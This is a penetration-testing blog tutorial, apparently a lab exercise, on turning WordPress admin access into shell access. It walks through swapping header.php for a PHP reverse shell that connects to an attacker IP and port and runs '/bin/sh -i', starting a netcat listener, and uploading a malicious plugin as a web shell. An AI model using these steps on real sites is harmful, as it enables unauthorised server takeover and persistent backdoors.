Penetration Test : WordPress reverse shell

Hi Everyone,

I would like to continue our last exercise that we try to penetrate to the wordpress application.

We did a brute force that we can finally find a valid admin password which is “admin”. This is a very fatal mistake that the server admin left the wordpress installation as default.

After we can get into the wordpress, what can we do next ? The best things that you could do is to have the reverse shell or upload a web shell to the server in order to have a better navigation in the server. I would explain both in this post

Reverse Shell

Reverse shell is mechanism that allow you to have the server shell by exploiting the web server to trigger a connection back to the CnC server. On the CnC server will create a listening server that waiting for the connection from the server.

Advantages

  1. It give you a full control of server shell just like an SSH
  2. Allow you to do further enumeration on the server

Disadvatages

  1. If you are required to analyse database then it will be very tedious do it in the console
  2. Quite hard to do reverse shell if you don’t have IP that application server can reach the CnC server
  3.  Easier to be targeted by Firewall since the web server will trigger a tcp connection back to the CnC

Web Shell

Web Shell is method that we upload a file to become as the backdoor which give you some function to administer the web server such as file editor, file browser, SQL database browser and many more and depends on the maturity of the backdoor

Advantages

  1. Easy navigation and file handling on the server
  2. GUI.. GUI .. GUI
  3. Harder to detect since this come as normal http request and if it is encapsulated in HTTPS then even harder to detect by intermediate security device
  4. Easy to edit the some files

Disadvantages

  1. Less flexible to do further enumartion

OK now lets begin to do the reverse shell.

  1. Login to the wordpress
  2. Go to appearance –> Editor
    22
  3. on the right side you can choose header.php
  4. You can change the code of all header.php to become the php reverse shell code. I got it from pentestmonkey http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  5. After you change the header.php code to become the php code from the downloaded file, dont forget to change the $ip and $port to point back to your host such as below
    <?php
    
    set_time_limit (0);
    $VERSION = "1.0";
    $ip =<strong> '192.168.5.200'</strong>; // CHANGE THIS
    $port =<strong> 8090;</strong> // CHANGE THIS
    $chunk_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a; w; id; /bin/sh -i';
    $daemon = 0;
    $debug = 0;
    
    
  6. Press update file
    23
  7. You need to start listening server at port 8090 to accept the reverse connection from the server with the command as shown nc -nlvp 8090
  8. Here there are the reverse shell in get connected

The above step is to setup the reverse shell that allow the server create a connection back to your host

Let start uploading the webshell.

  1. Login to the wordpress
  2. Go to pluggin and install a new pluggin
    24
  3. Before that you can download the pluggin from https://github.com/wetw0rk/malicious-wordpress-plugin.git
  4. You add new plugin by uploading the plugin zip to the wordpress
    25
  5. and press install now
  6. After successfully installation, you can see your plugin in the list
    26
  7. Now you can access the webshell by using the full path to the webshell. In my wordpress path I can access the file using this path http://192.168.5.193/wordpress/wp-content/plugins/wp-shell-plugin-master/wp-shell-plugin.php
    27
  8. As how above, you can see that the web shell is opened, You can navigate and browse some file in the server using this web.

You now have been able to do the shell via both web and reverse tcp. It is a crucial skill that penetration tester shall have because it will make the process of taking over the server become easier which result faster

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s